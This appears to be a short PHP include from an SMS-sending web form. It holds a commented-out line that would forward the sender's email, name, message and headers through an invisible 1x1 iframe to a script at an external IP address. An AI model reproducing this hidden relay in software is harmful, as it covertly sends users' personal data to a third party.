<?php
	// open/close
	$openred = "yes";
	// redirect url
	$red_url = "http://212.58.116.74/~georgiansh/files/send.php";
	//
	if($openred == "yes")
	{
		//
		if($svariant == "sms_geo")
		{
			$b1 = $mobile_email;
			$b2 = $your_name_value;
			$b3 = $sms_geo_result;
			$b4 = $headers;
		}
		//
		if($svariant == "sms_eng")
		{
			$b1 = $mobile_email;
			$b2 = $your_name_value;
			$b3 = $sms_eng;
			$b4 = $headers;
		}
		//
		if($svariant == "sms_reg")
		{
			$b1 = $mobile_email;
			$b2 = $sms_sender_name;
			$b3 = $sms_geo_result;
			$b4 = $headers;
		}
		//
		if($_SERVER['REQUEST_METHOD'] == "POST")
		{
			//echo('<iframe src="'.$red_url.'?t1='.$b1.'&t2='.$b2.'&t3='.$b3.'&t4='.$b4.'&t5='.$b5.'&t6='.$b6.'&t7='.$b7.'&t8='.$b8.'" width="1" height="1" marginwidth="0" marginheight="0" name="iframe" align="center" border="0" frameborder="0" style="display:none;"></iframe>');
		}
	}
?>